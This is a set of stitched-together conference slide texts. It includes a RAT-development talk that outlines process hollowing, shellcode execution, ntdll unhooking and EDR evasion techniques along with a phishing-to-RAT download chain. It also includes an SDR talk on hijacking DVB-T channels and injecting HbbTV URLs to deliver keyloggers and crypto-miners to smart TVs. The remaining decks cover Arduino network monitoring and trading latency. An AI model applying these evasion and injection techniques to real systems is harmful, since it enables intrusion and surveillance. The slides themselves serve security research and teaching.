CreateProcessA to start a new process. The flag 0x4 is passed to start it suspended, just before it
would run its code.
●
ZwQueryInformationProcess to get the address of the process's PEB (process environment block)
●
ReadProcessMemory to query the PEB for the image base address
●
ReadProcessMemory again to read from the image base address (loading in the PE header for
example)
●
WriteProcessMemory to overwrite the memory from the code base address with shellcode
●
ResumeThread to restart the suspended process, triggering the shellcode.
Source: https://github.com/ChrisPritchard/golang-shellcode-runner
Process hollowing
56
RAT Development
06/01/2022
0
2^64
Code
Kernel32.dll
NTDLL.DLL
av.dll
Syscall
VirtualAlloc()
VirtualAlloc()
VirtualAlloc()
Again UMH bypass
57
RAT Development
06/01/2022
0
2^64
Code
Kernel32.dll
NTDLL.DLL
av.dll
Syscall
VirtualAlloc()
VirtualAlloc()
Again UMH bypass
58
RAT Development
06/01/2022
Demo: Process Hollowing
ID: T1055.012 “Projess Injection: Process Hollowing”
59
RAT Development
06/01/2022
Demo: Copy First
ID: T1036.003 Masquerading: Rename System Utilities
60
RAT Development
06/01/2022
Develop
your own
RAT
Summary
EDR/AV Evasion
61
RAT Development
06/01/2022
RAT
Tools
Hide RAT
(signatures)
Hide Tools
(signatures)
Hide Tools Execution
(UMH, EDR)
Security product defense
62
RAT Development
06/01/2022
malware.exe
Domain.ch
1.2.3.4
net.exe
cmd.exe
wmic.exe
lolbins
mimikatz.exe
adfind.exe
Hacking tools
AV
EDR
exec
Process Injection
Process Hollowing
Shellcode Execution
Signatures
Usermode Hooks
Events
powershell.exe
dotnet.exe
Malicious scripts
AMSI
http
63
RAT Development
06/01/2022
Command executions
Execute
cmd.exe
commandline
Powershell
commandline
LOL EXE’s
copyfirst
hollow
remote
.NET, Powershell
Sacrificial process
AMSI bypass
64
RAT Development
06/01/2022
Running shellcode techniques:
●
CreateFiber
●
CreateProcess
●
CreateProcessWithPipe
●
CreateRemoteThread
●
CreateRemoteThreatNative
●
CreateThread
●
CreateThreadNative
●
EarlyBird
●
EtwpCreateEtwThreadEx
●
RtlCreateUserThread
●
Syscall
●
UuidFromStringA
●
NtQueueApcThread
Fix or bypass ntdll.dll hooks:
●
Syswhisper 1, 2, 3
○
Direct syscalls
●
Hell’s Gate
○
Direct syscalls
●
BananaPhone
○
Like hells gate, but more go, more banana
●
Firewalker
○
Single-step ntdll.dll calls, find jmp and live-patch
code
●
Parallel-asis
○
Using windows parallel loader to load ntdll.dll
again
●
ScareCrow
○
Overwrite ntdll from disk (framework, detected
now?)
●
Reflexxion
○
Overwrite ntdll from disk
○
Using direct system calls
○
Go implementation
Security product defense
65
RAT Development
06/01/2022
Confuse EDR’s
PE:
●
Process Ghosting
○
Temporary PE
●
Process Herpaderping
○
PE in transacted state
●
Process Doppelgänging
○
PE in delete pending state
(TxF)
●
Process Reimaging
○
Cache syncronization issue
●
Module Stomping
●
Function Stomping
Security product defense
Memory scanning evasion:
●
Gargoyle
●
DeepSleep
66
RAT Development
06/01/2022
●
SOCKS5 proxy support
○
Dont run tools on the endpoint
○
Run tools on your analyst workstation
○
Just proxy everything through the RAT
■
Burp, nmap, RDP, SSH, Impacket for SMB attack
●
Todo: Implement OctoPwn Dolphin agent
○
See talk yesterday “Hacking from the browser” from Tamas Jos
Avoid tools, proxy traffic
Open features
67
RAT Development
06/01/2022
Develop
your own
RAT
Summary
68
RAT Development
06/01/2022
●
AV & EDR can be bypassed easily
○
Mostly defender in this presentation
●
Lots of scanning and detection still happen in userspace
○
Even in our own address space!
●
This may change in the future?
○
Kernel mode hooks
○
Mini-filter
●
Move to lower level better logging
Security products bypass summary
69
RAT Development
06/01/2022
Is it worth writing your own RAT as a RedTeam?
●
Probably smarter to use, patch, or update existing open source one
●
Or just write your own Agent
○
Re-use existing C2
Is it worth it as an enthusiast?
●
Absolutely
DIY?
70
RAT Development
06/01/2022
RAT Development for RedTeaming
●
Analyse SOC Usecases
●
Define required features
●
Think about architecture
●
Steal Copy from existing projects
●
Time required: Months++
●
Features:
○
Execute stuff
○
Upload, download files
DIY for RedTeams
71
RAT Development
06/01/2022
Sliver: https://github.com/BishopFox/sliver (Go) <- hype
Merlin: https://github.com/Ne0nd0g/merlin (Go)
Mythic: https://github.com/its-a-feature/Mythic (Python)
Apollo, Mythic Agent: https://github.com/MythicAgents/Apollo (.NET)
Covenant: https://github.com/cobbr/Covenant (.NET)
Empire: https://github.com/BC-SECURITY/Empire (PowerShell, C#)
C2 Alternatives
72
RAT Development
06/01/2022
Not covered: Detect tool actions
●
IDS
●
NIDS
●
AD/DC surveillance (e.g. Defender for Identity)
●
Honeypots
Also: Every AV and EDR is different
Not covered security tools
73
RAT Development
06/01/2022
Oh no (Defender)
74
RAT Development
06/01/2022
Thank you for your time
Probably no time for questions… :-(
75
RAT Development
06/01/2022
https://github.com/klezVirus/inceptor/tree/main/slides
Inceptor - Bypass AV-EDR solutions combining well known techniques
https://synzack.github.io/Blinding-EDR-On-Windows/
Blinding EDR On Windows
76
RAT Development
06/01/2022
Proxy Support
●
For HTTP and Websocket
●
Authenticated proxy (password,
kerberos… -> proxyplease library)
File upload/download
●
Size…
●
Dont wanna log it completely?
Communication
●
Go, Websockets require strongly typed
data
●
Request arguments, response data is
variable
●
Dict type key/value
Smartness
●
Put smartness into Client, C2, Or UI?
Windows mischief
●
Mimikatz integration
●
LSASS dumping
●
Windows process token
●
Pass the hash
SOCKS Proxy support
CI/CD integration
Not covered features
77
RAT Development
06/01/2022
Oh no (Sophos)
78
RAT Development
06/01/2022
Donut
●
Compile .NET/EXE to Shellcode
●
Execute shellcode in new process
C2
Donut
RAT
Donut
Simple
Stupid
EXE
shellcode
A typical phishing attack
Docx
Makro: exec bat
bat
Write vbs
Execute vbs
Powershell script
Download malware / RAT
Phishing Mail
Vbs
Download Powershell script
Execute powershell script
80
RAT Development
06/01/2022
Dev Envrionment:
●
Proxmox @ Hetzner
●
Wireguard
●
Caddy
●
Visual Studio Code with remote development server
81
RAT Development
06/01/2022
●
EDRs collect data from endpoints and send them for storage and
processing in a centralised database. There, the collected events, binaries
etc., will be correlated in real-time to detect and analyse suspicious activities
on the monitored hosts. Thus, EDRs boost the capabilities of SOCs as they
discover and alert both the user and the emergency response teams of
emerging cyber threats.
●
EDRs are heavily rule-based; nevertheless, machine learning or AI methods
have gradually found their way into these systems to facilitate finding new
patterns and correlations
Source: An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
EDRs
Operational security
●
Operational security
○
Make connectors authenticated (api-key)
○
Make backend authenticated (admin-api-key)
○
Encrypt all communication
○
(Sign packets)
●
Protocol Mischief
○
Assuming BlueTeam reversed found malware
○
Snoop on broadcasted commands (identify further IOC’s)
○
Inject commands for other clients?
○
Accessing commands from other clients?
○
Access uploaded data (from client, or further attack tools)?
○
Flood server with fake answers, making it unusable?
83
RAT Development
06/01/2022
Why write a RAT?
BloodHoundGang slack
84
RAT Development
06/01/2022
Downstream / Wingman
RAT.exe
Wingman.exe
SMB Pipes
Files
TCP Socket
(loyal) Wingman.exe
85
RAT Development
06/01/2022 | pdf |
Blinkie Lights!
Network Monitoring with Arduino
Steve Ocepek
Copyright Trustwave 2010
Confidential
Disclaimer
Due to legal concerns, slides containing one or more of the
following have been removed:
•
Depictions of violence
•
Dancing animals
•
Transvestites
•
Questionable remains of biological origin
•
Drunk people
•
Copyrighted images
LEGAL APPROVED*
* subject to terms and conditions
Copyright Trustwave 2010
Confidential
Early Market Trends
* not affiliated with Diamond Multimedia or its subsidiaries
Copyright Trustwave 2010
Confidential
Industry Progression
* smoking Cloud may be hazardous to your health.
Copyright Trustwave 2010
Confidential
Realization
•
I don’t know what the hell my box is doing anymore
•
I don’t know what normal looks like
•
2 minute pcap file > 2 minute MP3
•
My netstat hurts
Copyright Trustwave 2010
Confidential
The Activity Light is Solid
Copyright Trustwave 2010
Confidential
Third Party Analysis
* any resemblance to real persons, living or dead is purely coincidental.
Copyright Trustwave 2010
Confidential
Wait, monitoring?
#1: You mean like IDS, IPS, NAC, sniffers, scrapers, log
monitors, and the theory of Atlantis?
#2: No, I mean like wtf is my box doing?
#1: Yeah try wireshark noob
#2: Just because I am a genetically enhanced 3-month-old is
no reason to make this personal. Besides wireshark is for
analysis, not monitoring.
#3: Can you guys keep it down? This 2-person escape pod is
bad enough without your 21st century era IT debate
reenactments.
Copyright Trustwave 2010
Confidential
Something… else
•
Like the old days, the activity lights on modems and stuff
•
Something that makes a good excuse for Arduino and
sounds good on a Defcon schedule
•
And has freaking blinkie lights
•
Something that provides visibility
Copyright Trustwave 2010
Confidential
Visibility vs. Visualization
•
Going for something that’s more “peripheral”, tap into
human cognition
•
Making up my own distinctions here
•
Visualization
• Tends to be complex, static image that we stare at
•
Visibility - more tactical, realtime
• i.e. the military term: our ability to “see” what’s there
(depending on weather conditions, etc) and make decisions
•
Visualization taps into our ability to reason
•
Visibility taps into our cognition
Copyright Trustwave 2010
Confidential
Real-time Cognition
•
I only sort of know what I’m talking about here
•
Examples:
• Driving
• Video Games
• Sports
•
Direct connection between the senses
•
Acute perception of slight variances in stimuli
•
Dude I made that up and it sounds awesome
Copyright Trustwave 2010
Confidential
Scholarly Reference
“Real-time cognition is best described not as a sequence of
logical operations performed on discrete symbols but as a
continuously changing pattern of neuronal activity.”
Continuous Dynamics in Real-Time Cognition
Michael J. Spivey and Rick Dale
Cornell University and University of Memphis
Let’s play with electronics
Copyright Trustwave 2010
Confidential
Peripherals
•
Screen real estate market is tapped out
• The maximize button
• Widget displays such as Dashboard are on-demand only
•
USB trinkets/toys are on the rise
• Nerf shooter
• Ninja detectors
• LED Christmas trees
Copyright Trustwave 2010
Confidential
Crazy idea
•
Render network data onto LED matrix in realtime
•
Use color, motion, other effects to show what happening on
the wire
•
Try to get back a “feel” for what our systems are doing
•
Tap into our natural pattern-matching ability to detect
variances
Copyright Trustwave 2010
Confidential
cerealbox
•
Name came from our tendency to read/interpret anything in
front of us
•
Kind of a “background” technology, something that we see
peripherally
•
Pattern detection lets us see variances without digging too
deep
•
Just enough info to let us know when it’s time to dig deeper
Copyright Trustwave 2010
Confidential
Arduino Uno
•
Cool little boards, based on Atmel ATMega328
• 8-bit RISC CPU @ 16Mhz
• 32k flash (storage for program code / opt. static storage)
• 2k SRAM (storage for data manipulation by program)
•
USB-powered
•
USB-to-serial communication
• ATMega8U2
• No hardware handshaking yet L
•
Good reference manual, easy-to-use
IDE
•
Price: ~ $30
Copyright Trustwave 2010
Confidential
Colors Shield
•
Arduino “shield” that connects to header pins
•
Makes it easy to manipulate multicolor LEDs
directly
•
iTead Studio: ~15
•
Plus 8x8 multicolor
LED Matrix: ~21
•
Total for all parts, about $66
Copyright Trustwave 2010
Confidential
Design Goals
•
Simplicity
•
Controller on host system sends data over serial
•
cerealbox interprets, renders to screen
•
Minimal data retention (2k SRAM!)
•
Minimal data processing
• Session based vs. packet based
•
Easy to understand, extend
Copyright Trustwave 2010
Confidential
Data points
•
MAC address
• L2 data might let us do something about MITM
•
IP address
•
TCP/UDP port
• Breakdown data by service
•
Country Code
• Let’s take advantage of GeoIP
Copyright Trustwave 2010
Confidential
Language
1,00254B000102,0A000001,0050,US
1 – Command, open = 1, close = 2
MAC Address
IP Address (hex)
Port number (hex)
Country Code
Copyright Trustwave 2010
Confidential
Arduino code
•
Session tracker code on Defcon CD
•
Everything is basic C – limited but “good enough”
•
Primary tools are arrays and for loops
•
Hashtables – possible with hacks but not native
Copyright Trustwave 2010
Confidential
Arduino code
Text processing is fun
//"1"
-‐
add
command
if
(cmd[0]
==
49
||
cmd[0]
==
50)
{
//Check
validity
of
data
boolean
invalid
=
false;
for
(int
x=1;
x
<
28;
x++)
{
if
((cmd[x]
>=
48
&&
cmd[x]
<=
57)
||
(cmd[x]
>=
65
&&
cmd[x]
<=
90)
||
(cmd[x]
==
44))
{}
else
invalid
=
true;
}
Copyright Trustwave 2010
Confidential
Colorduino Library
•
C library by Lincomatic, huge help in dealing with LEDs
•
Works with Colors Shield and Colorduino by iTead
Setting an LED:
//Set
3,8
to
Blue
Colorduino.SetPixel(3,8,0,0,255);
Colorduino.FlipPage();
//Using
a
pointer
PixelRGB
*p
=
GetPixel(3,8);
p-‐>r
=
0;
p-‐>g
=
0;
p-‐>b
=
255;
//
Can
do
p++
to
increment
through
LEDs
Copyright Trustwave 2010
Confidential
Converting Country Code to RGB
•
Country colors are procedurally created
• vs. a table, which would take up SRAM/Flash
•
Arduino random is simply a long string of numbers
• Can use other sources for true random
• But we actually want reproducible pseudo-random numbers
•
ASCII value of last Country Code letter is Random Seed for
Red
•
First letter -> Green
•
Resulting Green random number is seed for Blue
Copyright Trustwave 2010
Confidential
All the Colors of the Skype Rainbow
Copyright Trustwave 2010
Confidential
Data Storage
•
Simplified communication model = Arduino data storage
•
Close (IP) (Port) – how does it know which LED?
•
Store IP and Port in array
•
9 bytes per entry
• RGB, IP, Port
•
128 entries ~ 1.2K
• OMG mah SRAM’s
Copyright Trustwave 2010
Confidential
Array
//Add
to
array
led[pos][0]
=
r;
led[pos][1]
=
g;
led[pos][2]
=
b;
//pos
3-‐6
are
ip
led[pos][3]
=
tohex(cmd[15])*16
+
tohex(cmd[16]);
led[pos][4]
=
tohex(cmd[17])*16
+
tohex(cmd[18]);
led[pos][5]
=
tohex(cmd[19])*16
+
tohex(cmd[20]);
led[pos][6]
=
tohex(cmd[21])*16
+
tohex(cmd[22]);
//pos
7-‐8
are
port
led[pos][7]
=
tohex(cmd[24])*16
+
tohex(cmd[25]);
led[pos][8]
=
tohex(cmd[26])*16
+
tohex(cmd[27]);
Copyright Trustwave 2010
Confidential
Meter mode
•
Another take on the dataset
•
Based on types of sessions being made
•
Equalizer-ish view
•
Give visibility to spikes, type of traffic being sent
Copyright Trustwave 2010
Confidential
Performance considerations
•
9600 bps link, no handshaking
• Could up the speed, but be careful
•
9600 bps ~ 1200 bytes/second
•
Message size: 32 bytes
•
37 messages / sec, real probably about 32
Copyright Trustwave 2010
Confidential
Inferno mode
•
Display limited to 128 connections
•
Need to have a freak-out mode
• Throw hands up
• Let user know that things are getting silly
•
Preferably something psychedelic
Copyright Trustwave 2010
Confidential
Overload Detection
#define
OVERLOAD
90
if
(numcmd
>
OVERLOAD)
{
mode
=
9;
//Delete
all
and
start
over
while
(pos
>
0)
{
delete_record(pos-‐1);
pos-‐-‐;
}
}
Copyright Trustwave 2010
Confidential
Controller code
•
Perl script using Net::Pcap
• It works on Snow Leopard too
•
Fairly simple logic to enumerate sessions, do GeoIP
•
Pipes over serial to Arduino
•
2 messages, Open (1) and Close (2)
Copyright Trustwave 2010
Confidential
Future Ideas
•
Ethernet Shield
• Eliminate need for USB/program
• Would need 2x adapters
• Performance would probably
take a crap
•
Better host-side program
• Show more data behind each
light
•
Bigger LEDs
• You know, for senior citizens
Copyright Trustwave 2010
Confidential
Links
•
Lincomatic’s Colorduino library
• http://blog.lincomatic.com/?p=148
•
iTead – makers of Colors Shield and Colorduino
• http://iteadstudio.com
•
Arduino Uno
• http://arduino.cc/en/Main/ArduinoBoardUno
•
Ardunio Programming Reference
• http://arduino.cc/en/Reference/
Q & A | pdf |
DefCON 27, Pedro Cabrera
SDR Against Smart TVs;
URL and channel injection
attacks
DefCON 27, Pedro Cabrera
@PCabreraCamara
DefCON 27, Pedro Cabrera
Industrial engineer, UAV professional pilot, Radio Ham (EA4HCF)
Ethon Shield, Founder
2018 RSA: “Parrot Drones Hijacking”
2017 BH Asia Trainings (+ Simon Roses):
“Attacking 2G/3G mobile networks, smartphones and apps”
RogueBTS, IMSICatchers, FakeStations: www.fakebts.com
@PCabreraCamara
About Me
DefCON 27, Pedro Cabrera
This.Presentation:
I.
HbbTV 101. Digital TV introduction
II. Hacking TV & HbbTV.
III. HbbTV RX stations.
IV. Targeting the Smart TV browser.
V. Conclusions
DefCON 27, Pedro Cabrera
[I] Hybrid Broadcast Broadband Televison
HbbTV
(2009)
H4TV
project
HTML profit
project
Hybrid television because it
merges digital television
content and web content.
The HbbTV specification extends DVB-T by introducing additional metadata formats that mix broadband Internet
content into the digital television channel.
SPA
ENG
DefCON 27, Pedro Cabrera
[I] TV Distribution Network
Generic TV Network
DefCON 27, Pedro Cabrera
[I] DVB-T
DVB-T characteristics (Spain):
•
8 MHz bandwidth
•
Transmission mode: 8k (6,817 carriers).
•
Modulation schemes: 64 Quadrature Amplitude Modulation
(OFDM)
•
Code Rate for internal error protection: 2/3.
•
Length of guard interval: 1/4.
DefCON 27, Pedro Cabrera
[I] DVB-T
DVB-T characteristics (Spain):
•
8 MHz bandwidth
•
Transmission mode: 8k (6,817 carriers).
•
Modulation schemes: 64 Quadrature Amplitude Modulation
(OFDM)
•
Code Rate for internal error protection: 2/3.
•
Length of guard interval: 1/4.
DefCON 27, Pedro Cabrera
[I] Generic DVB-T receiver
Radio
Frequency
MPEG-2
Multiplex
DeModulator
DeMultiplexer
Video Decoder
Audio Decoder
Metadata
Decoder
DVB-T
Tuner
RTL-SDR:
Rafael 820T2
RTL-SDR:
Realtek RTL2832u
DefCON 27, Pedro Cabrera
[I] DVB-T demodulator
MPEG-2
MUX
Radio
Frequency
RadioFreq
Receiver
ADC
Synchronizer
Fast Fourier
Transformer
Channel
Estimator
&
Channel
Equalizer
Inner Deinterleaver
Viterbi
Decoder
Outer
Deinterleaver
Reed
Solomon
Decoder
DeScrambler
DefCON 27, Pedro Cabrera
[I] DVB-T linux demodulator
•
Bogdan Diaconescu
(YO3IIU)
gr-dvbt
(USRP N210)
•
GNU Radio:
gr-dtv (USRP)
•
Ron Economos (W6RZ)
dtv-utils (BladeRF)
DefCON 27, Pedro Cabrera
DVB-T Modulation:
-
8 MHz Bandwidth (SR)
-
Transmission mode: 8k
-
Modulation scheme:
64 QAM
-
Code Rate: 2/3.
-
Length of guard interval:
1/4
[I] DVB-T linux demodulator
DefCON 27, Pedro Cabrera
[I] TV Channels & Frequencies
D ig ita l M u tip le x
C h a n n e l
F r e q u e n c y
M P E 5
a treseries H D
482.000.000
M P E 5
B eM a d tv H D
482.000.000
M P E 5
R ea lm a d rid TV H D
482.000.000
M P E 4
TR EC E
514.000.000
M P E 4
En e rg y
514.000.000
M P E 4
m e g a
514.000.000
M P E 4
B o in g
514.000.000
M P E 1
P A R A M O U N T C H A N N EL
570.000.000
M P E 1
G O L
570.000.000
M P E 1
D M A X
570.000.000
M P E 1
D isn ey C h a n n el
570.000.000
T L 0 6 M
TR EC E
618.000.000
T L 0 6 M
In tereco n o m ia TV
618.000.000
T L 0 6 M
H IT TV
618.000.000
T L 0 6 M
M eg a S ta r
618.000.000
T L 0 6 M
C G TN -Esp a ñ o l
618.000.000
T L 0 6 M
C a n a l G a lería
618.000.000
T L 0 6 M
B u sin ess TV
618.000.000
T L 0 6 M
8m a d rid
618.000.000
R G E 2
td p H D
634.000.000
R G E 2
TEN
634.000.000
R G E 2
D K IS S
634.000.000
R G E 2
td p
634.000.000
R G E 2
C lan H D
634.000.000
D ig ita l M u tip le x
C h a n n e l
F r e q u e n c y
M P E 3
Telecin co
698.000.000
M P E 3
Telecin co H D
698.000.000
M P E 3
C u a tro
698.000.000
M P E 3
C u a tro H D
698.000.000
M P E 3
F D F
698.000.000
M P E 3
D iv in ity
698.000.000
M A U T
Telem a d rid H D
746.000.000
M A U T
Telem a d rid
746.000.000
M A U T
LA O TR A
746.000.000
M A U T
B O M
746.000.000
R G E 1
La 2 H D
770.000.000
R G E 1
La 2
770.000.000
R G E 1
La 1 H D
770.000.000
R G E 1
La 1
770.000.000
R G E 1
C la n
770.000.000
R G E 1
24h
770.000.000
M P E 2
n o v a
778.000.000
M P E 2
n eo x
778.000.000
M P E 2
la S ex ta H D
778.000.000
M P E 2
la S ex ta
778.000.000
M P E 2
a n ten a 3 H D
778.000.000
M P E 2
a n ten a 3
778.000.000
DefCON 27, Pedro Cabrera
482
570
618
698
746 770 & 778
MPE5
MPE1
TL06M
MPE3
MAUT
RGE1 & MPE2
514
MPE4
634
RGE2
DefCON 27, Pedro Cabrera
DefCON 27, Pedro Cabrera
[II] Background: TV hijacking attacks
•
East Coast USA 1986. At 12:32, HBO (Home Box Office) received its satellite signal from its
operations center on Long Island in New York interrupted by a man who calls himself "Captain
Midnight". The interruption occurred during a presentation by The Falcon and the Snowman.
•
CHICAGO 1987 WGN (Channel 9) sportscast is hijacked at 9:14 pm on November 22. Someone
wearing a Max Headroom mask and wearing a yellow blazer interrupted a recorded segment of
the "Chicago Bears" for about 25 seconds. At 23:15 the broadcast of an episode of "Dr. Who" on
the WTTW network was interrupted by the same character, this time with strange audio, an
appearance of another person and a longer time in the air.
•
Lebanon war 2006. During the Lebanon War of 2006, Israel overloaded the satellite broadcast of
Al Manar TV of Hezbollah to broadcast anti-Hezbollah propaganda.
https://en.wikipedia.org/wiki/
Broadcast_signal_intrusion
DefCON 27, Pedro Cabrera
[II] Smart TV attacks state of the art
•
June 2014 - Weeping Angel (CIA) - WikiLeaks. It shows exactly what an agent must do to turn a Samsung Smart
TV into a microphone. Attack requires local access to the Smart TV.
•
April 2015 - Yossef Oren and Angelos D. Keromytis "Attacking the Internet using Broadcast Digital Television".
Theoretical study on the potential attacks on the HbbTV System.
•
February 2017 - Rafael Scheel "Hacking a Smart TV". It presents two vulnerabilities to two Samsung Smart TV web
browsers: Flash and Javascript, which it exploits by creating its own HbbTV application, broadcasting it through its
own DVB-T channel. For this, it uses a low-cost proprietary device and an unpublished SW. In no case does it use
SDR or OpenSource tools.
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Hijacking
Channel injection
URL injection
DefCON 27, Pedro Cabrera
Using the same frequency and channel metadata as in the original channel, we will transmit our video file using
BladeRF, HackRF or any capable SDR supported by GNURadio:
gr-dtv
(gr-dvbt)
Video file
HbbTV
Channel
metada
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new A/V
content:
Transport
stream file
Video file
ffmpeg
original_network_id = XXXX
transport_stream_id = YY
service_id = [ZZZ]
pmt_pid = [VV]
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new A/V
content:
Transport
stream file
Video file
HbbTV
Metadata
(hbbtv-dvbstream)
1. ffmpeg
2. OpenCaster
original_network_id = XXXX
transport_stream_id = YY
service_id = [ZZZ]
pmt_pid = [VV]
Video TS
Audio TS
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Parameters
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Parameters
Linux command line:
dvbv5-scan (DVBv5 Tools)
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
[III] TV antenna facility attack
We can eliminate the radio phase by injecting our signal into the antenna facility, replacing the main TV stream from the
antenna with our stream.
Amplifier
Splitter
DefCON 27, Pedro Cabrera
TV antenna
facility
TV splitters (1/3)
[III] TV antenna facility attack
DefCON 27, Pedro Cabrera
TV antenna
facility
TV splitters (1/4)
[III] TV antenna facility attack (II)
TV Amplifier
DefCON 27, Pedro Cabrera
[III] TV antenna facility attack
DefCON 27, Pedro Cabrera
[III] Why miniaturization ?
https://www.uavsystemsinternational.com/how-much-weight-can-a-drone-lift/
DefCON 27, Pedro Cabrera
[III] Miniaturization – Drone attacks
GPD
480gr
BladeRF
170gr
HackRF
100gr
Bateria iPhone 10.000mA 280gr
Bateria Solar 24.000mA
350gr
Bateria NeoXeo 6.000mA 100gr
Odroid C2
68gr
Carcasa Odroid
32gr
300 gr
DefCON 27, Pedro Cabrera
[III] Drone attack
DefCON 27, Pedro Cabrera
[III] DVB-T Channel Hijacking: Impact
Generic TV Network
DefCON 27, Pedro Cabrera
[III] DVB-T Channel Hijacking: Impact
DefCON 27, Pedro Cabrera
[IV] URL Injection attack
The HbbTV standard allows Smart TVs to send GET requests to the URL transmitted by the channel (station) every so
often:
URL
DefCON 27, Pedro Cabrera
[IV] URL Injection attack
DefCON 27, Pedro Cabrera
[IV] URL Injection attack: Basic
We add the URL of our fake server in the HbbTV metadata: application name, base URL, web page,
organizationId and applicationId
gr-dtv
(gr-dvbt)
Video file
HbbTV
Channel
Metada (URL)
DefCON 27, Pedro Cabrera
[IV] URL Injection attack: Video Replay
gr-dtv
(gr-dvbt)
Channel video
& audio
HbbTV
Channel
Metada (URL)
DVBv5 Tools
dvbsnoop
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new
Application/URL content:
Video file
Transport
stream file
[IV] URL injection attack
HbbTV
Metadata
(hbbtv-dvbstream)
1. ffmpeg
2. OpenCaster
appli_name = [“DefCON27"]
appli_root = ["http://10.0.0.1/"]
appli_path = ["index1.htm"]
Video TS
Audio TS
DefCON 27, Pedro Cabrera
User
Browser
HbbTV
Browser
[IV] One SmartTV, two browsers
SDR URL injection attack
ARP Poison/DNS Hijacking URL injection attack
[ ]
· HbbTV Browser
(remote)
· HbbTV & User
Browsers
(requires WLAN
access)
HbbTV
Browser
DefCON 27, Pedro Cabrera
[IV] One SmartTV, two browsers
Samsung TV:
HbbTV/1.2.1 (+DRM+TVPLUS;Samsung;SmartTV2017;T-KTMDEUC-1106.2;;)
Mozilla/5.0 (SMART-TV; Linux; Tizen 3.0) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.0
Chrome/47.0.2526.69 TV safari/537.36
Panasonic TV:
HbbTV/1.2.1 (;Panasonic;VIERA 2014;3.101;6101-0003 0010-0000;)
Mozilla/5.0 (X11; FreeBSD; U; Viera; es-ES) AppleWebKit/537.11 (KHTML, like Gecko) Viera/3.10.14
Chrome/23.0.1271.97 Safari/537.11
DefCON 27, Pedro Cabrera
[IV] Smart (TV) scanning
Apache Log files:
•
Public IP address
•
Models/Manufacturers
(UA)
•
DVB-T
Channels/Audience
analysis
DefCON 27, Pedro Cabrera
[IV] Video replay & URL injection attack
dvbv5-zap
gr-dvbt
dvbsnoop
tscbrmuxer
DefCON 27, Pedro Cabrera
[IV] Social engineering (SE) attacks
DefCON 27, Pedro Cabrera
[IV] Keylogger attack
DefCON 27, Pedro Cabrera
[IV] Crypto Mining
https://www.coindesk.com/hackers-infect-50000-servers-with-
sophisticated-crypto-mining-malware
https://medium.com/tebs-lab/cryptojacking-hackers-just-
want-to-borrow-your-cpu-ebf769c28537
https://www.tripwire.com/state-of-security/latest-security-
news/4k-websites-infected-with-crypto-miner-after-tech-provider-
hacked/
https://www.express.co.uk/finance/city/911278/c
ryptocurrency-hacking-bitcoin-ripple-ethereum-
mining-youtube-adverts
DefCON 27, Pedro Cabrera
[IV] Crypto Mining attack
DefCON 27, Pedro Cabrera
[IV] Hooking user browser
DefCON 27, Pedro Cabrera
[IV] User browser attack
DefCON 27, Pedro Cabrera
[V] Conclusions
https://www.eff.org/files/2019/07/09/whitepaper_imsicatc
hers_eff_0.pdf
https://maritime-executive.com/editorials/mass-gps-spoofing-
attack-in-black-sea
DefCON 27, Pedro Cabrera
[V] Conclusions
https://www.choice.com.au/electronics-and-technology/home-entertainment/tvs-
and-projectors/buying-guides/tvs
https://voicebot.ai/2018/07/19/smart-tv-market-share-to-rise-to-70-in-
2018-driven-by-streaming-services-alexa-and-google-assistant/
DefCON 27, Pedro Cabrera
Thank You
2019 August, DefCON 27
Gonzalo Manera
Pepe Cámara
Alvaro Castellanos
Luis Bernal (aka n0p)
github.com/pcabreracamara/DC27 | pdf |
security when
nanoseconds count
James Arlen, CISA
DEF CON 19
disclaimer
I am employed in the Infosec industry,
but not authorized to speak on behalf
of my employer or clients.
Everything I say can be blamed on
the voices in your head.
2
credentials
•
15+ years information security specialist
•
staff operations, consultant, auditor, researcher
•
utilities vertical (grid operations, generation, distribution)
•
financial vertical (banks, trust companies, trading)
•
some hacker related stuff (founder of think|haus)
...still not an expert at anything.
3
nanoseconds...
4
5
Admiral Hopper says...
From an interview segment by Morley Safer in 1982
$=c (speed of light matters)
• distance light travels in a:
• millisecond ~300km (~186 miles)
• microsecond ~300m (~328 yards)
• nanosecond ~30cm (~1 foot)
6
before you ask...
•
This is a talk about... $$
•
I’m not going to mention any of those things on your
buzz-word bingo card:
•
SCADA
•
APT
•
PCI - DSS
•
wikileaks
•
(anti-|lulz)sec
•
hacktivism
•
...insert more here.
7
finance at DEF CON?
• You know it!
• DEF CON is all about offensive and defensive
techniques and technologies
• Sometimes, knowing that a vulnerability exists
to be exploited helps to focus attention.
• Sometimes, people like me tell you things that
sound completely crazy but have a history of
coming true.
8
trading history
•
1200s - Commodity and Debt trading
•
1500s - Inter-market trading
•
1600s - Equity trading
•
early 1800s - Reuters uses carrier pigeons
•
late 1800s - electronic ticker tape (market data feeds) become
widespread
•
mid 1900s - quotation systems (next price rather than last
price) become widespread
•
late 1900s - computers are used to maintain the records
of the exchange
•
early 2000s - computers begin trading with each other
without human intervention
9
definitions
• high speed trading: committing trades on a
scale faster than human interactive speeds
• algorithmic trading: trades based on the
mathematical result of incoming
information from external sources (news,
market data, etc.)
10
arbitrage
• the practice of taking advantage of a price difference
between two or more markets: striking a combination of
matching deals that capitalize upon the imbalance, the
profit being the difference between the market prices.
• in space - between two geographically separated
markets
• in time - between the moment information is available
and the moment information is widely known
11
time
• when markets were new (middle of last
millennium) trade times were measured at a
very human scale
• late 1800s brought trade times to minutes
• 1900s brought trade times to seconds
• 2000s bring trade times in 100s of
microseconds
• Future trade times may well involve
tachyon emissions
12
architecture
13
how fast is fast?
• seconds: you have no position
• milliseconds: you lose nearly every time
• sub-millisecond: big players regularly beat you
• 100s of microseconds: you’re a bit player and
missing a lot
• 10s of microseconds: you’re usually winning
14
predictability
• Almost as important as sheer speed is
predictable speed.
• Enemies are: jitter, packet loss, inefficient
